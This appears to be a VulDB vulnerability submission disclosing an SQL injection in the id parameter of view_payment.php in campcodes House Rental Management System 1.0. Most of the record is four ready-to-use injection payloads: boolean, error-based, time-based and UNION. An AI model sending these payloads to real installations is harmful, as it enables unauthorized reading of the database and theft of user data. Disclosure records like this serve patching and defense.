Title | campcodes House Rental Management System ≤1.0 SQL injection |
---|
Description | SQL injection vulnerability exists in id parameter of view_payment.php file of House Rental Management System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload: id=1 AND 8765=(SELECT (CASE WHEN (8765=8765) THEN 8765 ELSE (SELECT 4736 UNION SELECT 3233) END))-- -
or
id=(SELECT 7508 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(7508=7508,1))),0x7178706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
or
id=1 AND (SELECT 6097 FROM (SELECT(SLEEP(5)))EAQV)
or
id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a6a71,0x7079435944534e61487553505a5346484f655763687747544d6a7575494e7a625251735a63704357,0x7178706b71),NULL,NULL-- - |
---|
Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/House%20Rental%20Management%20System/House%20Rental%20Management%20System%20-%20vuln%201.pdf |
---|
User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (ID 38936) |
---|
Submission | 2024-04-10 16:37 (1 month ago) |
---|
Moderation | 2024-04-12 10:43 (2 days later) |
---|
Status | Przyjęty |
---|
VulDB Entry | 260483 |
---|